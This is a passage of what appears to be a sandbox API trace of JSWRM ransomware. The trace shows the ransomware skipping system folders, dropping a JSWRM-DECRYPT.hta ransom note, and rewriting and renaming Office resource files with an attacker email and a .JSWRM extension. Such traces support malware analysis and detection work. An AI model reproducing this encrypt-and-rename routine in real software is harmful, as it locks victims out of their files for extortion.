ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.868] FindClose (in: hFindFile=0x232100 | out: hFindFile=0x232100) returned 1 [0136.868] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1565dae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sr-Cyrl-BA", cAlternateFileName="SR-CYR~1")) returned 1 [0136.868] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2=".") returned 1 [0136.868] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="..") returned 1 [0136.868] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="...") returned 1 [0136.868] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="windows") returned -1 [0136.868] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="recovery") returned 1 [0136.869] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="perflogs") returned 1 [0136.869] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="documents and settings") returned 1 [0136.869] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="$RECYCLE.BIN") returned 1 [0136.869] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="system volume information") returned -1 [0136.869] lstrcmpiW (lpString1="sr-Cyrl-BA", lpString2="msocache") returned 1 [0136.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-ba\\jswrm-decrypt.hta")) returned 0xffffffff [0136.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-ba\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.870] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.870] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.871] CloseHandle (hObject=0x238) returned 1 [0136.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-ba\\jswrm-decrypt.hta")) returned 0x20 [0136.871] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x483e1138, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0136.871] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.871] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x483e1138, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.871] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.871] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.871] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x483e1138, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x483e1138, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x483e1138, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.871] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.872] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf158c060, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.872] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-ba\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.873] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.873] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.873] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.876] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.876] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.876] CloseHandle (hObject=0x314) returned 1 [0136.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-ba\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-BA\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-ba\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.877] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1565dae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1565dae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf158c060, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.877] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0136.877] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf443017d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44563cd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sr-Cyrl-CS", cAlternateFileName="SR-CYR~2")) returned 1 [0136.877] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2=".") returned 1 [0136.877] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="..") returned 1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="...") returned 1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="windows") returned -1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="recovery") returned 1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="perflogs") returned 1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="documents and settings") returned 1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="$RECYCLE.BIN") returned 1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="system volume information") returned -1 [0136.878] lstrcmpiW (lpString1="sr-Cyrl-CS", lpString2="msocache") returned 1 [0136.878] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-cs\\jswrm-decrypt.hta")) returned 0xffffffff [0136.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.879] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.879] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.880] CloseHandle (hObject=0x238) returned 1 [0136.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-cs\\jswrm-decrypt.hta")) returned 0x20 [0136.881] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44563cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4840722e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0136.881] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.881] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf443017d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44563cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4840722e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.881] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.881] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.881] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4840722e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4840722e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4840722e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.881] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.881] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44563cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44563cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44c8b33, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.881] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.881] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.881] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.882] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-cs\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.884] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.884] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.884] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.886] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.886] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.887] CloseHandle (hObject=0x314) returned 1 [0136.887] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-cs\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\sr-Cyrl-CS\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\sr-cyrl-cs\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.888] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44563cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44563cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, 